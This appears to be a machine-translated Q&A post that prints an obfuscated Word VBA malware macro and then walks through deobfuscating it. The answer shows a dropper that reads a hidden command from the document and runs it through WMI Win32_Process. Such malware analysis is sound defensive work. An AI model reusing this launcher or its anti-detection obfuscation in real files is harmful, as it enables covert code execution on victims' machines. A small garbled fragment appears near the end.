Open "wMlGriIC.YqLZwG.IfqJAT" For Binary As 176
Open "qSgyRp.VhQHDEA.ggPyFQd" For Binary As 176
Put #176, , TfsIR
Close #176
DvDefEl:
Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
"2)(inqq)(s2)(3qq)(s" + _
"2)(2qq)(s2)(_qq)(s2)("
GoTo vAZQiJB
Dim xuHzWGDG As String 'RmbpI
Open "ZRfmBGEw.yZYjFMHP.ckDWe" For Binary As 141
Open "gbBrhF.kCOlJnAJ.GLIdD" For Binary As 141
Open "MBUUAw.NbPECAix.UyuHH" For Binary As 141
Put #141, , xuHzWGDG
Close #141
vAZQiJB:
GoTo nmWOSYyF
Dim QPqDJP As String 'HLdYiFJHC
Open "LwmxHCmp.NFrlTBA.VFGtT" For Binary As 149
Open "ofEFEBH.KSyFFWK.TKfABI" For Binary As 149
Open "gyhfb.ipvwBrE.vVquOxU" For Binary As 149
Put #149, , QPqDJP
Close #149
nmWOSYyF:
GoTo tWXiIJDnz
Dim PJjuJ As String 'gmzmA
Open "RkYwxnJEW.rgdTkJfGF.zantCJ" For Binary As 152
Open "yxpQHDBA.zkorIAiHS.StjAKJ" For Binary As 152
Open "nbYwYEWhC.CeOFDlC.VvhoEHt" For Binary As 152
Put #152, , PJjuJ
Close #152
tWXiIJDnz:
R67uawfvzvw = "wqq)(s2" + _
")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
GoTo SyZjrEHAG
Dim UjcXr As String 'MpbLCImG
Open "WanlBnGn.vOkxHB.FUNtGuCCw" For Binary As 52
Open "krLiFHpF.eVBFvd.JWHZCso" For Binary As 52
Open "umSoGWOGJ.uhkWJDAQ.ACsLFB" For Binary As 52
Put #52, , UjcXr
Close #52
SyZjrEHAG:
GoTo uXAHJydE
Dim HpQEA As String 'THrtIBIAD
Open "rRdnUjHbw.iDplGAz.PjQxp" For Binary As 211
Open "TXrkTGK.FbNkBCE.nGfkHCJj" For Binary As 211
Open "fnehJF.MwLyDGIC.meixAlF" For Binary As 211
Put #211, , HpQEA
Close #211
uXAHJydE:
GoTo PYuemWAC
Dim DiIIF As String 'OPurH
Open "nXywAI.gJpfbBO.HipQCDYJJ" For Binary As 129
Open "SZqPCAC.pZyeTtAF.ORiEHGH" For Binary As 129
Open "OrYPhm.tEuCH.YaWnFsI" For Binary As 129
Put #129, , DiIIF
Close #129
PYuemWAC:
Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
GoTo UxlgEAI
Dim rFHJy As String 'zHXJG
Open "CRkMC.mCwoR.dFnkA" For Binary As 185
Open "jrtAEKE.uIVzu.jqMwAC" For Binary As 185
Open "HJmgHkBC.MyfFGEi.rTJlw" For Binary As 185
Put #185, , rFHJy
Close #185
UxlgEAI:
GoTo vIDVA
Dim GWbqA As String 'UxHBcFQ
Open "YeMqlJ.uCiqCNS.WjgigV" For Binary As 159
Open "DrttFCz.lpfOt.UeCjC" For Binary As 159
Open "AscqIIYrJ.JeGiiSE.mYjmAABJ" For Binary As 159
Put #159, , GWbqA
Close #159
vIDVA:
GoTo lutoTsPkH
Dim nmwGcQ As String 'OTTxPImEN
Open "iVnKJ.YEevQ.GWucCAFI" For Binary As 217
Open "NxgIP.TARFAADew.NyFRA" For Binary As 217
Open "NvrZDA.DdShRHFtD.BErohw" For Binary As 217
Put #217, , nmwGcQ
Close #217
lutoTsPkH:
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
GoTo QdQmIDzTC
Dim akWgAQAIC As String 'rMAWIEja
Open "lHZGGIbGc.iaJoCAFB.VNeICCIax" For Binary As 206
Open "RdpGJIBOF.swjFv.IeAbvID" For Binary As 206
Open "IyaYxC.BTSLmDJ.jgOiOIDGT" For Binary As 206
Put #206, , akWgAQAIC
Close #206
QdQmIDzTC:
GoTo zNPNECkYX
Dim JZcLuFA As String 'VtNiGGmD
Open "FOxJQVBLi.dDrmJG.osuuaBIDb" For Binary As 125
Open "gWUYvHr.ZTgQT.DNujcI" For Binary As 125
Open "BwDJADFsC.LJFNLbb.daiRJD" For Binary As 125
Put #125, , JZcLuFA
Close #125
zNPNECkYX:
GoTo vmJnC
Dim OahWDBD As String 'zMMkH
Open "xINyH.PTxmCYVEI.ZjICHD" For Binary As 167
Open "ywqUjrAcG.nStXYBIsJ.CUmPFEHE" For Binary As 167
Open "gThcAJ.ZKJdpcm.tjPbu" For Binary As 167
Put #167, , OahWDBD
Close #167
vmJnC:
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
GoTo sFyhnDDx
Dim PCRIYp As String 'pMvRFAK
Open "sNdvIH.EwGNvsEC.ALrzVIC" For Binary As 203
Open "sClXGS.DwVOXN.VhyWJEJ" For Binary As 203
Open "UtEKe.Ylfjhi.utxEPXwo" For Binary As 203
Put #203, , PCRIYp
Close #203
sFyhnDDx:
GoTo RKPFYlFb
Dim pRdXtubFT As String 'gfQxcwC
Open "QsQGaIC.AwxeAW.xtrtFCFdF" For Binary As 158
Open "TxVEJ.iXjAEimg.TDSdLDOA" For Binary As 158
Open "ThIgAFZBB.NbVEqpw.YsHvp" For Binary As 158
Put #158, , pRdXtubFT
Close #158
RKPFYlFb:
GoTo vmlpJOA
Dim HUPVnvFAA As String 'WkgKBIH
Open "rxhFoG.AShLFJDl.zybsiV" For Binary As 191
Open "UDZsNIDG.VfdgH.MBiBLq" For Binary As 191
Open "MAIbDAaJ.BfRJzI.vKbPTLCD" For Binary As 191
Put #191, , HUPVnvFAA
Close #191
vmlpJOA:
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
GoTo PViTAAED
Dim KMChE As String 'tdXnByPb
Open "IJzlC.SoCtG.TPbXhBKrm" For Binary As 94
Open "GAzJGdUeC.SjRAxF.SebwGKPCv" For Binary As 94
Open "BCyTAdFeI.MvwOCAI.YKhJFAApg" For Binary As 94
Put #94, , KMChE
Close #94
PViTAAED:
GoTo RBFRbHBg
Dim DqWYFGG As String 'UDjSMF
Open "AQlXBCb.vtUJfcFG.uXigEO" For Binary As 214
Open "ZDHjAEWl.doArj.lPBxKCC" For Binary As 214
Open "aGQoDDk.VZsZQhDoP.fnRuG" For Binary As 214
Put #214, , DqWYFGG
Close #214
RBFRbHBg:
GoTo SFgGtIlpD
Dim GDZZqGDJ As String 'FpwxECGKS
Open "gMgqJJ.sEwvhb.SuXWmVIA" For Binary As 106
Open "nrzOZDa.ZzIiFFSE.VjWVF" For Binary As 106
Open "vPEJJqH.jFzYA.AlzwaDJBw" For Binary As 106
Put #106, , GDZZqGDJ
Close #106
SFgGtIlpD:
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
GoTo xjadBeU
Dim nmTHypHA As String 'DVUNjGqL
Open "cURDDF.pLPgGlcD.FYnPCELJI" For Binary As 127
Open "HvCbXDBq.RUZaGEzC.bgBsAAd" For Binary As 127
Open "vBsfDkB.xlZBIMF.TDVEEFQJ" For Binary As 127
Put #127, , nmTHypHA
Close #127
xjadBeU:
GoTo wWUQDA
Dim AEazvYO As String 'WmUZOHEM
Open "DMNSECHJb.bbxJxAEDq.LnJxA" For Binary As 55
Open "gFPXD.IEgaqJz.YAHsC" For Binary As 55
Open "lEilB.QvPXD.cMfWCJO" For Binary As 55
Put #55, , AEazvYO
Close #55
wWUQDA:
GoTo xFoIFC
Dim YFLpuEi As String 'WteBl
Open "nfhAABBEB.VeDeFP.sKzKuBBC" For Binary As 203
Open "wXXiJHf.TCBShGYr.DNKsHT" For Binary As 203
Open "mQnnE.bmZQGSEA.AGkxGzCHX" For Binary As 203
Put #203, , YFLpuEi
Close #203
xFoIFC:
GoTo QGPRjInP
Dim WKiiJDVJq As String 'yoOwJD
Open "qyXGFD.Mnoog.UnkFG" For Binary As 109
Open "HKwtB.rBrtHJf.lLgDD" For Binary As 109
Open "AhHYjIBs.vNObEAAJ.IRARxrx" For Binary As 109
Put #109, , WKiiJDVJq
Close #109
QGPRjInP:
GoTo AsvyFHHC
Dim FymJHI As String 'DYLTWEF
Open "sLYJBI.TQZluJA.LgcFP" For Binary As 175
Open "ojxyHHEP.vXfQD.OBTMB" For Binary As 175
Open "AlRZo.MXGVMDVDJ.FRGRQ" For Binary As 175
Put #175, , FymJHI
Close #175
AsvyFHHC:
GoTo iKyOGBLAy
Dim zqgnJAxpy As String 'HZaLGI
Open "aKrxWJUr.NfKHtA.lWiIG" For Binary As 150
Open "byAGVzBQ.OjVafcB.yoXPx" For Binary As 150
Open "fSJtFAEEA.yqTyACLA.PWwsTDwIy" For Binary As 150
Put #150, , zqgnJAxpy
Close #150
iKyOGBLAy:
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
GoTo pUmEYEJA
Dim eRlMmLKx As String 'rpaKAI
Open "YeeTCIHp.dBrFLg.qZpkDJ" For Binary As 209
Open "ghtMtA.YUxUI.QTlVpGJg" For Binary As 209
Open "jevGKBz.ZpfmEFvDM.fkIcAGBII" For Binary As 209
Put #209, , eRlMmLKx
Close #209
pUmEYEJA:
GoTo CUZigB
Dim rJseFDK As String 'fQYhA
Open "qDBKOE.hcDCJ.BVRxGIBBJ" For Binary As 207
Open "ENMCE.LcqmMLm.kcwYHCV" For Binary As 207
Open "UaWqrCaA.UYSnZCG.urBVH" For Binary As 207
Put #207, , rJseFDK
Close #207
CUZigB:
GoTo XonQB
Dim TOMwIrgJ As String 'pIUaGf
Open "ohhFBJjA.uWdjpFFGk.FVdrHAB" For Binary As 189
Open "OEqrJ.wqhoDAHQ.xAflFS" For Binary As 189
Open "YWibCdgEJ.NDhrE.WdBFBFE" For Binary As 189
Put #189, , TOMwIrgJ
Close #189
XonQB:
GoTo rKyfgFyfq
Dim cztpFp As String 'YwYKGv
Open "ajyVJ.ohKLAGtFI.fshBTGEF" For Binary As 138
Open "imfriCGFb.tYNKga.WYPiZwEHH" For Binary As 138
Open "KuhBGApcv.ojBZUIIEX.HJefxELF" For Binary As 138
Put #138, , cztpFp
Close #138
rKyfgFyfq:
GoTo kvkwNE
Dim ugNdBHTqJ As String 'HtmXmvT
Open "aRotQ.FHGaEABuI.JNHZBdF" For Binary As 202
Open "uMBDk.VxvrDae.NYTTAIAe" For Binary As 202
Open "VWYJvN.lGHiEC.AlsbD" For Binary As 202
Put #202, , ugNdBHTqJ
Close #202
kvkwNE:
GoTo UaqRCIH
Dim bgosIAI As String 'hAsNYHIgo
Open "rFDaOyDH.hZniGGDBp.fHUVY" For Binary As 134
Open "KrSuJCFF.aeIBC.hRLXIc" For Binary As 134
Open "PuNKnKt.sBhbCCuE.ikMJIZFm" For Binary As 134
Put #134, , bgosIAI
Close #134
UaqRCIH:
End Function
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
GoTo oheeCHI
Dim iVJGnsW As String 'OEDeu
Open "GjkaJIH.peZmtHtGM.gypgP" For Binary As 140
Open "YBkxHBECF.YlsyXD.WgzGtH" For Binary As 140
Open "FbjEBIGb.HVqybIN.uhHkRpG" For Binary As 140
Put #140, , iVJGnsW
Close #140
oheeCHI:
GoTo yPqfxADJ
Dim qTLRXCv As String 'wvoHE
Open "fYqreeAI.UbBaCOpIW.ibhMgA" For Binary As 207
Open "yycyIZBxI.LLMLGP.MSuNHDBEY" For Binary As 207
Open "NxkCf.PoyHSN.naAFIEIY" For Binary As 207
Put #207, , qTLRXCv
Close #207
yPqfxADJ:
GoTo bRMAl
Dim qpTUMG As String 'FVzXiA
Open "klmCEx.LHwvHEV.nvbNG" For Binary As 210
Open "xlsUIHJ.HlAbuCnVB.fhPbXCDLR" For Binary As 210
Open "bpgkEyAEz.XZZWFRiW.DWsAgQ" For Binary As 210
Put #210, , qpTUMG
Close #210
bRMAl:
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
GoTo TrdMzBDZJ
Dim uhqsGuAB As String 'LyQczqYvJ
Open "XcQyeAFEH.OxwUTAF.OjTNwA" For Binary As 178
Open "QEkjG.mlBEHrAJ.IdkPDI" For Binary As 178
Open "INzOLEyBR.lEZxQ.rjitI" For Binary As 178
Put #178, , uhqsGuAB
Close #178
TrdMzBDZJ:
GoTo loQNDFH
Dim RBLslko As String 'BQaqZjA
Open "uxKEC.pIZoJF.srBaREc" For Binary As 135
Open "BOoAgEz.NoSsFEBBB.RueFu" For Binary As 135
Open "tPaIGWt.sNypwJ.uiODJJJA" For Binary As 135
Put #135, , RBLslko
Close #135
loQNDFH:
GoTo RjWVCNKEI
Dim XUDHDiKId As String 'DfsDD
Open "YJiQHG.tumcISEI.XTUZB" For Binary As 141
Open "QQMFr.jWYtE.SdCsJ" For Binary As 141
Open "PVgOlGBl.pUbOHFCY.MgaMJSI" For Binary As 141
Put #141, , XUDHDiKId
Close #141
RjWVCNKEI:
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
GoTo nMdUMleFB
Dim SLJdkBII As String 'FWRUNdgHJ
Open "FVMJB.OanJEHHDG.BFKlGjECA" For Binary As 163
Open "cDYsKH.cikTAY.Ezyuc" For Binary As 163
Open "uIxkJo.MWxKvDHC.vvgQEXJDH" For Binary As 163
Put #163, , SLJdkBII
Close #163
nMdUMleFB:
GoTo mdgvjEeAC
Dim LbhGD As String 'XKxXUoJG
Open "jbKPlXCDh.siqMFp.byKaIAlXB" For Binary As 192
Open "ooZqmESHe.BQQQEBd.iaBAnAZ" For Binary As 192
Open "SgKEFsHED.atIRE.nAXgHCyr" For Binary As 192
Put #192, , LbhGD
Close #192
mdgvjEeAC:
GoTo ojGsFHEEF
Dim IkDkKCv As String 'KClXGffED
Open "stscCEAUT.PziCFDmD.xEGKXRGTE" For Binary As 106
Open "fzpZGsD.rsWZI.nhqNVH" For Binary As 106
Open "MxRtxH.yGeKFDG.nRzlA" For Binary As 106
Put #106, , IkDkKCv
Close #106
ojGsFHEEF:
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
GoTo aeMpCH
Dim ClyWRG As String 'mYWbL
Open "eAdUlJHj.rMYTRAF.IMwLCCCT" For Binary As 170
Open "gaJjDP.jqoPjEzCA.sqvbMGBp" For Binary As 170
Open "kwgqDdCZ.UJhzPcBmS.DIZSAkBG" For Binary As 170
Put #170, , ClyWRG
Close #170
aeMpCH:
GoTo BHZQG
Dim HvnISHlCE As String 'ffPuICmH
Open "DySslFhhA.wiGJV.ChxbEmyAk" For Binary As 205
Open "NMdOHH.BANiFHPHQ.VGJSDA" For Binary As 205
Open "KtidJsSE.paErC.KUloBYBF" For Binary As 205
Put #205, , HvnISHlCE
Close #205
BHZQG:
GoTo vApdD
Dim vuEJPy As String 'OnFFAqHWH
Open "VmdtNNT.mylsHGACs.cOGFA" For Binary As 167
Open "vPtDJGH.uqPgaLD.WNoez" For Binary As 167
Open "dOeICmG.rNLBfGjIw.auFLHQY" For Binary As 167
Put #167, , vuEJPy
Close #167
vApdD:
End Function
我如何才能看到它的实际作用?这明明是加密的,但必须有办法解密,否则怎么能在任何机器上执行?
如果您注意,您会发现几乎每个 GoTo
都指向另一个 GoTo
而不是实际代码。您看到的大部分代码甚至都不会执行。如果这样做,它将失败并出现错误,因为它试图打开同一文件号下不存在的文件,这是不允许的。
您可以通过 GoTo
链轻松找到确实执行的行,只有一打。
识别出它们并删除仅存在以混淆反恶意软件的死代码后,您将得到三个相当短的函数:
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
HBYVV = ""
S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
End Function
Function Tujor4m47ob()
On Error Resume Next
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
sng2 = "qq)(" + "s2)(pq" + _
"q)(s2)("
F7_if4svnte = "qq)(s" + _
"2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
"(sqq)(s2)(sqq)(s2)(qq)(s2)("
Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
"2)(inqq)(s2)(3qq)(s" + _
"2)(2qq)(s2)(_qq)(s2)("
R67uawfvzvw = "wqq)(s2" + _
")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function
如果您随后将字符串文字折叠成一个并删除已知始终为空的虚假变量,您将得到:
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
S619csvpd1v4xzk5kc = VBA.Replace(Xoyqcbzwjyi6tqiw0z, "qq)(s2)(", "")
End Function
Function Tujor4m47ob()
On Error Resume Next
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
sng2 = "qq)(s2)(pqq)(s2)("
F7_if4svnte = "qq)(s2)(roqq)(s2)(qq)(s2)(ceqq)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("
Vbzhqcqh1pqco1e2_ = "qq)(s2)(:wqq)(s2)(qq)(s2)(inqq)(s2)(3qq)(s2)(2qq)(s2)(_qq)(s2)("
R67uawfvzvw = "wqq)(s2)(inqq)(s2)(mqq)(s2)(gmqq)(s2)(tqq)(s2)(qq)(s2)("
Kz1yuitvz3qu6xai = ChrW(wdKeyS)
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function
现在您或许可以为这些函数指定适当的名称,并将混淆后的字符串替换为对它们进行去混淆后的结果:
Function RemoveBogusQqFromString(input_string)
RemoveBogusQqFromString = VBA.Replace(input_string, "qq)(s2)(", "")
End Function
Function WrapperForRemoveBogusQqFromString(input_string)
On Error Resume Next
WrapperForRemoveBogusQqFromString = RemoveBogusQqFromString(input_string)
End Function
Function StartProcess()
On Error Resume Next
ObfuscatedCommandLineWithPrefix = T6dwlv_ivpoiq2.StoryRanges.Item(1)
Set ProcessObjectInstance = CreateObject("winmgmts:win32_process")
ObfuscatedCommandLine = Mid(ObfuscatedCommandLineWithPrefix, 5)
ProcessObjectInstance.Create WrapperForRemoveBogusQqFromString(ObfuscatedCommandLine), "", ""
End Function
这需要一个存储在名为 T6dwlv_ivpoiq2
的 Word 对象中的模糊命令行(我假设 ThisDocument
已重命名为那个)并通过 Win32_Process::Create
.[=20= 运行它]